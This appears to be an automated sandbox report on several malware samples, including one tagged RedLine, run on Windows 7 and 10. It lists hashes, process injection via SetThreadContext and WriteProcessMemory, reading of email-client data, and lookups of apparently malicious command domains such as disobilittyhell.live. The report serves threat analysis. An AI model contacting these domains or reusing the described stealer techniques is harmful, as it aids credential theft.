| SHA512 | 5cb7d4a972cc433d4d1d0b9cfdb2bac7948693a511498b0c5046f27ca83d7026f1c393330af13eb184b98dac61070ec068d27ac006d68ac2ea776f0b12b5ab51 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 78825905998c050b4bd20fe3f7d8d7a4 |
| SHA1 | b39104dec570e65876f98bc8b258ea41c61c05e3 |
| SHA256 | 47379278cd2327b0b4d69fec0f302a2abcc151374645e95c3fc8b7152011ddb9 |
| SHA512 | e13bbb0a4d5b757582e4e4b3019987c64177ab2d75b4acae796fbb42bc31449c4b5023f270451442a859909997816d37311fddc901dc956e3f4d890d901a2b2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4410fbd6728006bc547f7d8430e853f2 |
| SHA1 | 7022e40484f0be73094ebfa9beff527a76ab8b9a |
| SHA256 | 1a9f75a0a4b2dbbd142a4f4bd3770be2e65d9eaf521d47c594f94cca7eded120 |
| SHA512 | 6db1d415bd2a4c3b74df446a0e661017e5c6f3a8120e51d2d8c93c6082435cf81b57aba6f58553215e15a12a8cefc2a56564c93f0f068ed2d78330afb04a158a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 556f61b934c6b87cb66e0ab6684304a3 |
| SHA1 | 94df2760085a510859f0901d6b3cd11c5f56428f |
| SHA256 | c33b25b4ffce4df7d8cd592d56b4e9c136b767a386b5136f094985b13fe7ddc0 |
| SHA512 | a828dc962e514a20de6f5ee235b77f0467faf42bab7cd78a0151d56ecaaafc65fd994109232315bfd8ff8efabaa9d20fa0695e1c4c4a5d1efbbef64416a06142 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 08b8ab58f3f408a64f8ea8ded48ebf8d |
| SHA1 | ab91461602d315d00d5c3907276e1c14f45580d8 |
| SHA256 | 01801fe33eecda7541d64535fcf88dd8bfca9feccdec30bffd88b25c8c9e5cd8 |
| SHA512 | 2e133ffa8aaf5333b32c24772262f96f590a51f20788315fb85c632230c81710be445ecf63cdcfb704986646ee0d97c3d46a7a55685591d127ee4024caa31808 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1103cfd33d6868f18fcb50a601dc956f |
| SHA1 | 401aef94305881df5ab05362c6db5eacd70c4f1c |
| SHA256 | 28905433938cddf95ee75e57db3b69d0baa1eaa9ac996795ad9d67151870c5e9 |
| SHA512 | b096179054b63b55a7183e9e98a79d051f9b038d2dc839359d0ff65ba02d78561cdfaa8966ded8cc9cfc4697472b75975b63ad56b154f0a6299ec32064fcefcb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9e754dc3495cce45fa350582377c9759 |
| SHA1 | 434f54c7bceb8c303900abcebca7c8c9eb744d0d |
| SHA256 | 421bf2a53f6689d9e65e60e14781e548adbf0db5df7d926746ce29e6932b26c0 |
| SHA512 | 8456bac1e867122e1f141880a04980fab4da373eac374dfd489ebd2b19fcc031423c6d2acc4dacbc184fc80c506d95c6c09637384f99a2a00819638f31917d61 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3599df05b72ab0caf353d0e241823c56 |
| SHA1 | 95cd79ddc8e749a6d931395580e7e0024374c62f |
| SHA256 | 6d80f3d9e7255eae3d9d03a552fa156e6705ba25bfc377e2c41a1e98b04ab219 |
| SHA512 | a5f9b744f0e0d2ee3fb4e07e5e6aed6c8ba2e3152df608cd547f2413d8840d7ee4d8bd4c36e99851ef0ed44a19e6943d8f47b5ea56f77bdf2ecf9ea5ae78dd56 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 07f62e7598a135c1b2c017d88c5ff74c |
| SHA1 | 066d10d7ce1e5c7be4be7a2b1755fa40d48aeca6 |
| SHA256 | e9dfd801b94caceefddaa8d5eddcb5893abe84a38179423b426971fff0c6a81d |
| SHA512 | a79b7dcabe4bb327b19c4e1ee92b74df9edaa67c589cb7e12cea48360d6a8040fd4d09d2ea386c49ed48e57bd0d616b026d4b7f8d66e87b03757d9d2df2d5a11 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6ba58bea72b5376879e056418be7ed38 |
| SHA1 | 74373943eb26f3f6b5706013cd7c49c2ad532794 |
| SHA256 | 039961a85e32484ef46d221f9e2ba431f790dcbaf4131449ff9b7ecd8692e901 |
| SHA512 | 21baaf03bf6533b66ee62e2c09cfe283ef4223afba8ec1786db85dea270df73f12554e32aa60196688f2a657f1e71dadbf86c0d319081d11d0965487e65943eb |
Analysis: behavioral23
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
106s
Max time network
142s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3004 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3004 -ip 3004
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 800
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | fearleszsjourney.tech | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 172.67.137.158:443 | disobilittyhell.live | tcp |
| US | 172.67.137.158:443 | disobilittyhell.live | tcp |
| US | 172.67.137.158:443 | disobilittyhell.live | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.241.137:80 | www.microsoft.com | tcp |
Files
memory/3004-0-0x000000007519E000-0x000000007519F000-memory.dmp
memory/3004-1-0x0000000000920000-0x000000000097A000-memory.dmp
memory/3004-2-0x0000000005800000-0x0000000005DA4000-memory.dmp
memory/2772-4-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2772-6-0x0000000000400000-0x000000000045D000-memory.dmp
memory/3004-7-0x0000000075190000-0x0000000075940000-memory.dmp
memory/2772-8-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2772-9-0x0000000000400000-0x000000000045D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
140s
Max time network
138s
Command Line
Signatures
RedLine
Redline family
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1800-0-0x00000230A02D0000-0x00000230A03D0000-memory.dmp
memory/1800-1-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp
memory/1800-2-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp
memory/1800-3-0x00007FF605850000-0x00007FF6059FE000-memory.dmp
memory/1800-4-0x00000230A02D0000-0x00000230A03D0000-memory.dmp
memory/1800-5-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp
memory/1800-6-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2288 set thread context of 2788 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 148
Network
Files
memory/2288-0-0x000000007408E000-0x000000007408F000-memory.dmp
memory/2288-1-0x0000000000FC0000-0x000000000101A000-memory.dmp
memory/2788-13-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-11-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2788-15-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-9-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-7-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-5-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-4-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2788-3-0x0000000000400000-0x000000000045D000-memory.dmp
memory/2288-16-0x0000000074080000-0x000000007476E000-memory.dmp
memory/2288-17-0x000000007408E000-0x000000007408F000-memory.dmp
memory/2288-18-0x0000000074080000-0x000000007476E000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
144s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffd7fdc46f8,0x7ffd7fdc4708,0x7ffd7fdc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4912 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fffde59525dd5af902ac449748484b15 |
| SHA1 | 243968c68b819f03d15b48fc92029bf11e21bedc |
| SHA256 | 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762 |
| SHA512 | f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645 |
\??\pipe\LOCAL\crashpad_5092_WVNZWYKNJEBNBCPS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab283f88362e9716dd5c324319272528 |
| SHA1 | 84cebc7951a84d497b2c1017095c2c572e3648c4 |
| SHA256 | 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2 |
| SHA512 | 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6c79e94ad2036a8b2e71d7a8d740bc06 |
| SHA1 | b7d288dd22eb2ba1d381cbb3bbb331dab197182b |
| SHA256 | 2d1d4f8de6b9af94455631ce907243355ed02307a63ce48c8ea95e0e250a49b7 |
| SHA512 | 84a183f444254157749e4130e4f31fc31c594aa183eb3fa7dfcfeda1f7d9729cd3b88ff6d4a4ac2de1e95d727d1ef823439f803b2f417be55cab6bfcbfd1fef9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 67e28e2fdb5e4e1e2ec96e9a46344d3f |
| SHA1 | 61b72929feab739db69af1205998ae1986381039 |
| SHA256 | d4fd5719d33de7086b562390e03e89d5543122b442d73cf2d9f39e16f55e156b |
| SHA512 | 0e60eddc670d849f46e3bb60a104615a8f95c0a0c9983f6e9875c4fd5953d4102ffc98480b527042b7b64a3eb629699a924b8f674207ff80620109d3f678d90b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2713cf4e2633aa1d32a7f0d49372a125 |
| SHA1 | a14634b7251cdfea9ea04cf2940d392c5b6e9732 |
| SHA256 | 1406e72f31141b5892389fc4a68699afbc45e95b932fbbee51c3da8e3ff7808d |
| SHA512 | 54e39811b350429d13c789b2ee153b025d462c28fd23352317e0d9c42893cd5f17feb90acef580e6388b7df8b734c0e6d9239716e38fee958cdfe94237717f82 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"
Network
Files
memory/2528-0-0x000000013F7D0000-0x000000013F97E000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4500 set thread context of 4876 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
